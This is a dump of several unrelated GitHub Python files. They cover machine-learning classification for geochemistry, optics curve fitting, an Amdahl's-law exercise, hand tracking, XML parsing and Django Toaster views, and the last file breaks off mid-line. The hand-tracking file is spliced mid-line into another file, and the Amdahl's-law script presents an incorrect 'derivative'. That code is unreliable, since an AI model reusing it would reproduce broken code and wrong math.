+{"seq_id":"12042137392","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pandas as pd\nfrom multipledispatch import dispatch\n\nfrom ..constants import MLFLOW_ARTIFACT_DATA_PATH\nfrom ..model.classification import (\n ClassificationWorkflowBase,\n DecisionTreeClassification,\n ExtraTreesClassification,\n GradientBoostingClassification,\n KNNClassification,\n LogisticRegressionClassification,\n MLPClassification,\n RandomForestClassification,\n SVMClassification,\n XgboostClassification,\n)\nfrom ._base import ModelSelectionBase\n\n\nclass ClassificationModelSelection(ModelSelectionBase):\n \"\"\"Simulate the normal way of training classification algorithms.\"\"\"\n\n def __init__(self, model_name: str) -> None:\n self.model_name = model_name\n self.clf_workflow = ClassificationWorkflowBase()\n self.transformer_config = {}\n\n @dispatch(object, object, object, object, object, object)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n ) -> None:\n \"\"\"Train by Scikit-learn framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n hyper_parameters = SVMClassification.manual_hyper_parameters()\n self.clf_workflow = SVMClassification(\n kernel=hyper_parameters[\"kernel\"],\n degree=hyper_parameters[\"degree\"],\n gamma=hyper_parameters[\"gamma\"],\n C=hyper_parameters[\"C\"],\n shrinking=hyper_parameters[\"shrinking\"],\n )\n elif self.model_name == \"Decision Tree\":\n hyper_parameters = DecisionTreeClassification.manual_hyper_parameters()\n self.clf_workflow = DecisionTreeClassification(\n criterion=hyper_parameters[\"criterion\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n )\n elif self.model_name == \"Random Forest\":\n hyper_parameters = RandomForestClassification.manual_hyper_parameters()\n self.clf_workflow = RandomForestClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Xgboost\":\n hyper_parameters = XgboostClassification.manual_hyper_parameters()\n self.clf_workflow = XgboostClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n subsample=hyper_parameters[\"subsample\"],\n colsample_bytree=hyper_parameters[\"colsample_bytree\"],\n alpha=hyper_parameters[\"alpha\"],\n lambd=hyper_parameters[\"lambd\"],\n )\n elif self.model_name == \"Logistic Regression\":\n hyper_parameters = LogisticRegressionClassification.manual_hyper_parameters()\n self.clf_workflow = LogisticRegressionClassification(\n penalty=hyper_parameters[\"penalty\"],\n C=hyper_parameters[\"C\"],\n solver=hyper_parameters[\"solver\"],\n max_iter=hyper_parameters[\"max_iter\"],\n class_weight=hyper_parameters[\"class_weight\"],\n l1_ratio=hyper_parameters[\"l1_ratio\"],\n )\n elif self.model_name == \"Multi-layer Perceptron\":\n hyper_parameters = MLPClassification.manual_hyper_parameters()\n self.clf_workflow = MLPClassification(\n hidden_layer_sizes=hyper_parameters[\"hidden_layer_sizes\"],\n activation=hyper_parameters[\"activation\"],\n solver=hyper_parameters[\"solver\"],\n alpha=hyper_parameters[\"alpha\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_iter=hyper_parameters[\"max_iter\"],\n )\n elif self.model_name == \"Extra-Trees\":\n hyper_parameters = ExtraTreesClassification.manual_hyper_parameters()\n self.clf_workflow = ExtraTreesClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Gradient Boosting\":\n hyper_parameters = GradientBoostingClassification.manual_hyper_parameters()\n self.clf_workflow = GradientBoostingClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n subsample=hyper_parameters[\"subsample\"],\n loss=hyper_parameters[\"loss\"],\n )\n elif self.model_name == \"K-Nearest Neighbors\":\n hyper_parameters = KNNClassification.manual_hyper_parameters()\n self.clf_workflow = KNNClassification(\n n_neighbors=hyper_parameters[\"n_neighbors\"],\n weights=hyper_parameters[\"weights\"],\n algorithm=hyper_parameters[\"algorithm\"],\n leaf_size=hyper_parameters[\"leaf_size\"],\n p=hyper_parameters[\"p\"],\n metric=hyper_parameters[\"metric\"],\n )\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train)\n y_test_predict = self.clf_workflow.predict(X_test)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n self.clf_workflow.save_hyper_parameters(hyper_parameters, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components()\n\n # Special components of different algorithms\n self.clf_workflow.special_components()\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save()\n\n @dispatch(object, object, object, object, object, object, bool)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n is_automl: bool,\n ) -> None:\n \"\"\"Train by FLAML framework + RAY framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n self.clf_workflow = SVMClassification()\n elif self.model_name == \"Decision Tree\":\n self.clf_workflow = DecisionTreeClassification()\n elif self.model_name == \"Random Forest\":\n self.clf_workflow = RandomForestClassification()\n elif self.model_name == \"Xgboost\":\n self.clf_workflow = XgboostClassification()\n elif self.model_name == \"Logistic Regression\":\n self.clf_workflow = LogisticRegressionClassification()\n elif self.model_name == \"Multi-layer Perceptron\":\n self.clf_workflow = MLPClassification()\n elif self.model_name == \"Extra-Trees\":\n self.clf_workflow = ExtraTreesClassification()\n elif self.model_name == \"Gradient Boosting\":\n self.clf_workflow = GradientBoostingClassification()\n elif self.model_name == \"K-Nearest Neighbors\":\n self.clf_workflow = KNNClassification()\n\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train, is_automl)\n y_test_predict = self.clf_workflow.predict(X_test, is_automl)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n if self.clf_workflow.ray_best_model is not None:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.ray_best_model.get_params(), self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n else:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.automl.best_config, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components(is_automl)\n\n # Special components of different algorithms\n self.clf_workflow.special_components(is_automl)\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save(is_automl)\n","repo_name":"ZJUEarthData/geochemistrypi","sub_path":"geochemistrypi/data_mining/process/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"}
+{"seq_id":"44250696471","text":"from lab_framework import Manager, analysis\nfrom numpy import sin, cos, deg2rad, inf\nimport matplotlib.pyplot as plt\n\ndef fit_func(theta, phi, alpha, N, C):\n return N*(cos(deg2rad(alpha))**2 - 0.5*cos(2*deg2rad(alpha))*sin(2*deg2rad(theta-phi))**2) + C\n\nif __name__ == '__main__':\n \n TRIAL = 2\n SWEEP_PARAMS = [-15, -3, 30, 5, 3]\n UVHWP_ANGLE = 0\n\n '''\n # initialize the manager\n m = Manager(config='../config.json')\n\n # log session info\n m.log(f'AQWP.py TRIAL # {TRIAL}; SWEEP PARAMS = {SWEEP_PARAMS}; UVHWP ANGLE = {UVHWP_ANGLE}')\n\n # configure the UVHWP to produce _something_\n m.C_UV_HWP.goto(UVHWP_ANGLE)\n\n # sweep alice's quarter waveplate\n m.sweep('A_QWP', *SWEEP_PARAMS)\n\n # get the output\n df = m.output_data(f'AQWP_sweep{TRIAL}.csv')\n m.shutdown()\n '''\n\n df = Manager.load_data('AQWP_sweep1.csv')\n \n # fit the function\n params = analysis.fit(fit_func, df['A_QWP'], df['C4'], p0=[0, 90.1518, 2423, -46], bounds=[[-180, -180, -inf, -inf], [180, 180, inf, inf]], maxfev=1000)\n # params = analysis.fit('quadratic', df['A_QWP'], df['C4'])\n\n # print fitted parameters\n print(f'Fit parameters = {params}')\n\n # plotting\n # analysis.plot_func('quadratic', params, df['A_QWP'], color='b', linestyle='dashed', label=f'Fit Function', alpha=0.3)\n fig = plt.figure(figsize=(9,6))\n ax = fig.add_subplot(1,1,1)\n analysis.plot_func(fit_func, params, df['A_QWP'], color='b', linestyle='dashed', label=f'${params[2].n:.3f}[\\\\cos^2({params[1].n:.3f})+\\\\cos(2\\\\cdot{params[1].n:.3f})\\\\sin^2(2(\\\\theta{params[0].n:.3f}))/2]+{params[3].n:.3f}$', alpha=0.3)\n analysis.plot_errorbar(df['A_QWP'], df['C4'], ms=0.1, fmt='ro', capsize=2, label='Data')\n plt.xlabel('Alice\\'s QWP Angle (degrees)')\n plt.ylabel('Count Rate (#/s)')\n plt.legend()\n # plt.title(f'Fit=${params[1].n:.3f}(x-{params[0].n:.3f})^2 + {params[2].n:.3f}$')\n plt.title(f'Alice QWP Sweep')\n plt.savefig(f'AQWP_fit.png', dpi=600)\n plt.show()\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"calibration/AQWP/AQWP_fit.py","file_name":"AQWP_fit.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38117359183","text":"from gekko import GEKKO\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n### Code for this project was written by Brent M. Lund ###\r\n\r\nfor num in range(1, 10): #This is Amdahl's Law\r\n variable = 1 / num #variable represents the percentage change for the equation or fraction enhanced\r\n variable1 = (1 - variable) # 1 - by the fraction enhanced\r\n variable2 = (variable / num) #fraction enhanced / number of core processors\r\n variable3 = variable1 + variable2 #Variable1 was added to variable2\r\n variable4 = 1 / variable3 #divided one by the final product of variable 3\r\n print(\"Processor cores Added: \", num)\r\n print(\"Final Point of Amdel's Law: \", variable4)\r\n\r\nresult = [1, 1.3333, 1.28, 1.23, 1.19, 1.16, 1.13, 1.12]\r\nplt.plot(result)\r\nplt.show()\r\n\r\nprint(\"An Amdel Law derivative: \")\r\ndef Amdel_Law_derivative(derivative): #derivitave of Amdel's_Law\r\n k = .03\r\n derivative_V = derivative * (derivative + 1) #multiplied fraction enhanced with-\r\n derivative_X = (derivative - (derivative - 1 *(k))) #the number of core processors\r\n derivative_Y = (derivative_X) * (derivative_X) #the number of core processors-\r\n derivative_Z = derivative_V / derivative_Y\r\n #subtracted it by fraction enhanced\r\n #multiplied this result by itself\r\n print(derivative_Z)\r\n\r\nAmdel_Law_derivative(1)\r\nAmdel_Law_derivative(2)\r\nAmdel_Law_derivative(3)\r\nAmdel_Law_derivative(4)\r\nAmdel_Law_derivative(5)\r\nAmdel_Law_derivative(6)\r\nAmdel_Law_derivative(7)\r\nAmdel_Law_derivative(8)\r\n\r\n# function that returns dy/dt\r\ndef model(y, t): #applied my derivative of Amdel's_Law above-\r\n #and plugged it into the model function\r\n dev_v = y * (y + 1)\r\n dev_x = (y - (y - 1 * (.03)))\r\n dev_y = (dev_x) * (dev_x)\r\n dev_z = dev_v / dev_y\r\n dydt = dev_z\r\n return dydt\r\n\r\n# initial condition\r\ny0 = 1\r\n\r\n# time points\r\nt = np.linspace(0, 1000) # shows my eleven points between 0 and 10\r\n\r\ny = odeint(model, y0, t)\r\n\r\n# plot results\r\nplt.plot(t, y)\r\nplt.xlabel('time')\r\nplt.ylabel('y(t)')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Myron000/CST-305","sub_path":"Amdel's_Law.py","file_name":"Amdel's_Law.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2914359549","text":"import subprocess\nimport sys\nimport os\n\npackages = [\n \"statsmodels==0.11.1\",\n \"xgboost==0.90\",\n \"numpy==1.16.1\",\n \"glibc\",\n \"lxml\",\n \"sklearn-pandas\",\n \"lightgbm\",\n \"pandas\",\n \"numpy\",\n \"pytest-cov\",\n \"pytest\",\n \"codecov\",\n \"xmlschema\",\n \"scikit-learn==0.23.1\"\n]\n\ndef installPackage(package):\n subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", package])\n\nif __name__ == \"__main__\":\n for pck in packages:\n installPackage(pck)","repo_name":"mohammedfazil003/nyoka","sub_path":"nyoka/tests/_install_dependencies.py","file_name":"_install_dependencies.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"595773134","text":"#!/usr/bin/env python3\n\nimport sys\n\nif len(sys.argv) > 1:\n f = open( sys.argv[1] )\nelse:\n f = sys.stdin\n#just open file of interest with standard argument, first part is unnecessary \nfor line in f:\n if \"DROME\" in line:\n #drome refers to correct species\n fields = line.rstrip(\"\\r\\n\").split()\n #whitespace deliniation\n if fields[-1].startswith(\"FBgn\"):\n #look at the last column, they have to start with the FBgn to be counted in the printed dataset\n print(fields[3] + \" \" + fields[2])\n #prints two columns, first has flybase ID and second has uniprot ID","repo_name":"clmcnerney/qbb2018-answers","sub_path":"day2-homework/day2-homework-1.py","file_name":"day2-homework-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"52345756506","text":"import mediapipe\nimport cv2\nmedhands=mediapipe.solutions.hands\ndraw=mediapipe.solutions.drawing_utils\nhands=medhands.Hands(max_num_hands=1,min_detection_confidence=0.7)\n\ncap=cv2.VideoCapture(0)\nwhile True:\n success,img=cap.read()\n img=cv2.flip(img,1)\n imgrgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n res=hands.process(imgrgb)\n \n cv2.rectangle(img,(20,350),(90,440),(0,255,0),cv2.FILLED)\n tipids=[4,8,12,16,20]\n lmlist=[]\n\n if res.multi_hand_landmarks:\n for handlms in res.multi_hand_landmarks:\n for id,lm in enumerate(handlms.landmark):\n cx=lm.x\n cy=lm.y\n lmlist.append([id,cx,cy])\n \n if len(lmlist)!=0 and len(lmlist)==21:\n\n fingerlist=[]\n\n for i in range(0,5):\n\n if lmlist[tipids[i]][2]>>> could not print text')\r\n for item in node:\r\n getXMLData(item)\r\n else:\r\n return 0\r\n \r\n \r\ndef scan(): \r\n tree = etree.parse(xml_45_CFR_Section_11_10)\r\n root = tree.getroot()\r\n getXMLData(root)\r\n #print (g)\r\n \r\ndef main(): \r\n scan()\r\n \r\nif __name__ == \"__main__\": \r\n # calling main function \r\n main() \r\n\r\n\r\n","repo_name":"noblecook/research","sub_path":"PhDProject/edu/ttu/phd/tacm/RegulationTrainingSet.py","file_name":"RegulationTrainingSet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"70103136008","text":"import re\n\nfrom django.db.models import F, Q, Sum\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.http import urlencode\nfrom orm.models import Build, Target, Task, Layer, Layer_Version, Recipe\nfrom orm.models import LogMessage, Variable, Package_Dependency, Package\nfrom orm.models import Task_Dependency, Package_File\nfrom orm.models import Target_Installed_Package, Target_File\nfrom orm.models import TargetKernelFile, TargetSDKFile, Target_Image_File\nfrom orm.models import BitbakeVersion, CustomImageRecipe\n\nfrom django.urls import reverse, resolve\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseNotFound, JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta, datetime\nfrom toastergui.templatetags.projecttags import json as jsonfilter\nfrom decimal import Decimal\nimport json\nimport os\nfrom os.path import dirname\nimport mimetypes\n\nimport logging\n\nfrom toastermain.logs import log_view_mixin\n\nlogger = logging.getLogger(\"toaster\")\n\n# Project creation and managed build enable\nproject_enable = ('1' == os.environ.get('TOASTER_BUILDSERVER'))\nis_project_specific = ('1' == os.environ.get('TOASTER_PROJECTSPECIFIC'))\n\nclass MimeTypeFinder(object):\n # setting this to False enables additional non-standard mimetypes\n # to be included in the guess\n _strict = False\n\n # returns the mimetype for a file path as a string,\n # or 'application/octet-stream' if the type couldn't be guessed\n @classmethod\n def get_mimetype(self, path):\n guess = mimetypes.guess_type(path, self._strict)\n guessed_type = guess[0]\n if guessed_type is None:\n guessed_type = 'application/octet-stream'\n return guessed_type\n\n# single point to add global values into the context before rendering\n@log_view_mixin\ndef toaster_render(request, page, context):\n context['project_enable'] = project_enable\n context['project_specific'] = is_project_specific\n return render(request, page, context)\n\n\n# all new sessions should come through the landing page;\n# determine in which mode we are running in, and redirect appropriately\ndef landing(request):\n # in build mode, we redirect to the command-line builds page\n # if there are any builds for the default (cli builds) project\n default_project = Project.objects.get_or_create_default_project()\n default_project_builds = Build.objects.filter(project = default_project)\n\n # we only redirect to projects page if there is a user-generated project\n num_builds = Build.objects.all().count()\n user_projects = Project.objects.filter(is_default = False)\n has_user_project = user_projects.count() > 0\n\n if num_builds == 0 and has_user_project:\n return redirect(reverse('all-projects'), permanent = False)\n\n if num_builds > 0:\n return redirect(reverse('all-builds'), permanent = False)\n\n context = {'lvs_nos' : Layer_Version.objects.all().count()}\n\n return toaster_render(request, 'landing.html', context)\n\ndef objtojson(obj):\n from django.db.models.query import QuerySet\n from django.db.models import Model\n\n if isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, timedelta):\n return obj.total_seconds()\n elif isinstance(obj, QuerySet) or isinstance(obj, set):\n return list(obj)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif type(obj).__name__ == \"RelatedManager\":\n return [x.pk for x in obj.all()]\n elif hasattr( obj, '__dict__') and isinstance(obj, Model):\n d = obj.__dict__\n nd = dict(d)\n for di in d.keys():\n if di.startswith(\"_\"):\n del nd[di]\n elif isinstance(d[di], Model):\n nd[di] = d[di].pk\n elif isinstance(d[di], int) and hasattr(obj, \"get_%s_display\" % di):\n nd[di] = getattr(obj, \"get_%s_display\" % di)()\n return nd\n elif isinstance( obj, type(lambda x:x)):\n import inspect\n return inspect.getsourcelines(obj)[0]\n else:\n raise TypeError(\"Unserializable object %s (%s) of type %s\" % ( obj, dir(obj), type(obj)))\n\n\ndef _lv_to_dict(prj, x = None):\n if x is None:\n def wrapper(x):\n return _lv_to_dict(prj, x)\n return wrapper\n\n return {\"id\": x.pk,\n \"name\": x.layer.name,\n \"tooltip\": \"%s | %s\" % (x.layer.vcs_url,x.get_vcs_reference()),\n \"detail\": \"(%s\" % x.layer.vcs_url + (\")\" if x.release is None else \" | \"+x.get_vcs_reference()+\")\"),\n \"giturl\": x.layer.vcs_url,\n \"layerdetailurl\" : reverse('layerdetails', args=(prj.id,x.pk)),\n \"revision\" : x.get_vcs_reference(),\n }\n\n\ndef _build_page_range(paginator, index = 1):\n try:\n page = paginator.page(index)\n except PageNotAnInteger:\n page = paginator.page(1)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n\n\n page.page_range = [page.number]\n crt_range = 0\n for i in range(1,5):\n if (page.number + i) <= paginator.num_pages:\n page.page_range = page.page_range + [ page.number + i]\n crt_range +=1\n if (page.number - i) > 0:\n page.page_range = [page.number -i] + page.page_range\n crt_range +=1\n if crt_range == 4:\n break\n return page\n\n\ndef _verify_parameters(g, mandatory_parameters):\n miss = []\n for mp in mandatory_parameters:\n if not mp in g:\n miss.append(mp)\n if len(miss):\n return miss\n return None\n\ndef _redirect_parameters(view, g, mandatory_parameters, *args, **kwargs):\n try:\n from urllib import unquote, urlencode\n except ImportError:\n from urllib.parse import unquote, urlencode\n url = reverse(view, kwargs=kwargs)\n params = {}\n for i in g:\n params[i] = g[i]\n for i in mandatory_parameters:\n if not i in params:\n params[i] = unquote(str(mandatory_parameters[i]))\n\n return redirect(url + \"?%s\" % urlencode(params), permanent = False, **kwargs)\n\nclass RedirectException(Exception):\n def __init__(self, view, g, mandatory_parameters, *args, **kwargs):\n super(RedirectException, self).__init__()\n self.view = view\n self.g = g\n self.mandatory_parameters = mandatory_parameters\n self.oargs = args\n self.okwargs = kwargs\n\n def get_redirect_response(self):\n return _redirect_parameters(self.view, self.g, self.mandatory_parameters, self.oargs, **self.okwargs)\n\nFIELD_SEPARATOR = \":\"\nAND_VALUE_SEPARATOR = \"!\"\nOR_VALUE_SEPARATOR = \"|\"\nDESCENDING = \"-\"\n\ndef __get_q_for_val(name, value):\n if \"OR\" in value or \"AND\" in value:\n result = None\n for x in value.split(\"OR\"):\n x = __get_q_for_val(name, x)\n result = result | x if result else x\n return result\n if \"AND\" in value:\n result = None\n for x in value.split(\"AND\"):\n x = __get_q_for_val(name, x)\n result = result & x if result else x\n return result\n if value.startswith(\"NOT\"):\n value = value[3:]\n if value == 'None':\n value = None\n kwargs = { name : value }\n return ~Q(**kwargs)\n else:\n if value == 'None':\n value = None\n kwargs = { name : value }\n return Q(**kwargs)\n\ndef _get_filtering_query(filter_string):\n\n search_terms = filter_string.split(FIELD_SEPARATOR)\n and_keys = search_terms[0].split(AND_VALUE_SEPARATOR)\n and_values = search_terms[1].split(AND_VALUE_SEPARATOR)\n\n and_query = None\n for kv in zip(and_keys, and_values):\n or_keys = kv[0].split(OR_VALUE_SEPARATOR)\n or_values = kv[1].split(OR_VALUE_SEPARATOR)\n query = None\n for key, val in zip(or_keys, or_values):\n x = __get_q_for_val(key, val)\n query = query | x if query else x\n\n and_query = and_query & query if and_query else query\n\n return and_query\n\ndef _get_toggle_order(request, orderkey, toggle_reverse = False):\n if toggle_reverse:\n return \"%s:+\" % orderkey if request.GET.get('orderby', \"\") == \"%s:-\" % orderkey else \"%s:-\" % orderkey\n else:\n return \"%s:-\" % orderkey if request.GET.get('orderby', \"\") == \"%s:+\" % orderkey else \"%s:+\" % orderkey\n\ndef _get_toggle_order_icon(request, orderkey):\n if request.GET.get('orderby', \"\") == \"%s:+\"%orderkey:\n return \"down\"\n elif request.GET.get('orderby', \"\") == \"%s:-\"%orderkey:\n return \"up\"\n else:\n return None\n\n# we check that the input comes in a valid form that we can recognize\ndef _validate_input(field_input, model):\n\n invalid = None\n\n if field_input:\n field_input_list = field_input.split(FIELD_SEPARATOR)\n\n # Check we have only one colon\n if len(field_input_list) != 2:\n invalid = \"We have an invalid number of separators: \" + field_input + \" -> \" + str(field_input_list)\n return None, invalid\n\n # Check we have an equal number of terms both sides of the colon\n if len(field_input_list[0].split(AND_VALUE_SEPARATOR)) != len(field_input_list[1].split(AND_VALUE_SEPARATOR)):\n invalid = \"Not all arg names got values\"\n return None, invalid + str(field_input_list)\n\n # Check we are looking for a valid field\n valid_fields = [f.name for f in model._meta.get_fields()]\n for field in field_input_list[0].split(AND_VALUE_SEPARATOR):\n if True in [field.startswith(x) for x in valid_fields]:\n break\n else:\n return None, (field, valid_fields)\n\n return field_input, invalid\n\n# uses search_allowed_fields in orm/models.py to create a search query\n# for these fields with the supplied input text\ndef _get_search_results(search_term, queryset, model):\n search_object = None\n for st in search_term.split(\" \"):\n queries = None\n for field in model.search_allowed_fields:\n query = Q(**{field + '__icontains': st})\n queries = queries | query if queries else query\n\n search_object = search_object & queries if search_object else queries\n queryset = queryset.filter(search_object)\n\n return queryset\n\n\n# function to extract the search/filter/ordering parameters from the request\n# it uses the request and the model to validate input for the filter and orderby values\ndef _search_tuple(request, model):\n ordering_string, invalid = _validate_input(request.GET.get('orderby', ''), model)\n if invalid:\n raise BaseException(\"Invalid ordering model:\" + str(model) + str(invalid))\n\n filter_string, invalid = _validate_input(request.GET.get('filter', ''), model)\n if invalid:\n raise BaseException(\"Invalid filter \" + str(invalid))\n\n search_term = request.GET.get('search', '')\n return (filter_string, search_term, ordering_string)\n\n\n# returns a lazy-evaluated queryset for a filter/search/order combination\ndef _get_queryset(model, queryset, filter_string, search_term, ordering_string, ordering_secondary=''):\n if filter_string:\n filter_query = _get_filtering_query(filter_string)\n queryset = queryset.filter(filter_query)\n else:\n queryset = queryset.all()\n\n if search_term:\n queryset = _get_search_results(search_term, queryset, model)\n\n if ordering_string:\n column, order = ordering_string.split(':')\n if column == re.sub('-','',ordering_secondary):\n ordering_secondary=''\n if order.lower() == DESCENDING:\n column = '-' + column\n if ordering_secondary:\n queryset = queryset.order_by(column, ordering_secondary)\n else:\n queryset = queryset.order_by(column)\n\n # insure only distinct records (e.g. from multiple search hits) are returned\n return queryset.distinct()\n\n# returns the value of entries per page and the name of the applied sorting field.\n# if the value is given explicitly as a GET parameter it will be the first selected,\n# otherwise the cookie value will be used.\ndef _get_parameters_values(request, default_count, default_order):\n current_url = resolve(request.path_info).url_name\n pagesize = request.GET.get('count', request.session.get('%s_count' % current_url, default_count))\n orderby = request.GET.get('orderby', request.session.get('%s_orderby' % current_url, default_order))\n return (pagesize, orderby)\n\n\n# set cookies for parameters. this is usefull in case parameters are set\n# manually from the GET values of the link\ndef _set_parameters_values(pagesize, orderby, request):\n from django.urls import resolve\n current_url = resolve(request.path_info).url_name\n request.session['%s_count' % current_url] = pagesize\n request.session['%s_orderby' % current_url] =orderby\n\n# date range: normalize GUI's dd/mm/yyyy to date object\ndef _normalize_input_date(date_str,default):\n date_str=re.sub('/', '-', date_str)\n # accept dd/mm/yyyy to d/m/yy\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%Y\")\n except ValueError:\n # courtesy try with two digit year\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%y\")\n except ValueError:\n return default\n date_in = date_in.replace(tzinfo=default.tzinfo)\n return date_in\n\n# convert and normalize any received date range filter, for example:\n# \"completed_on__gte!completed_on__lt:01/03/2015!02/03/2015_daterange\" to\n# \"completed_on__gte!completed_on__lt:2015-03-01!2015-03-02\"\ndef _modify_date_range_filter(filter_string):\n # was the date range radio button selected?\n if 0 > filter_string.find('_daterange'):\n return filter_string,''\n # normalize GUI dates to database format\n filter_string = filter_string.replace('_daterange','').replace(':','!');\n filter_list = filter_string.split('!');\n if 4 != len(filter_list):\n return filter_string\n today = timezone.localtime(timezone.now())\n date_id = filter_list[1]\n date_from = _normalize_input_date(filter_list[2],today)\n date_to = _normalize_input_date(filter_list[3],today)\n # swap dates if manually set dates are out of order\n if date_to < date_from:\n date_to,date_from = date_from,date_to\n # convert to strings, make 'date_to' inclusive by moving to begining of next day\n date_from_str = 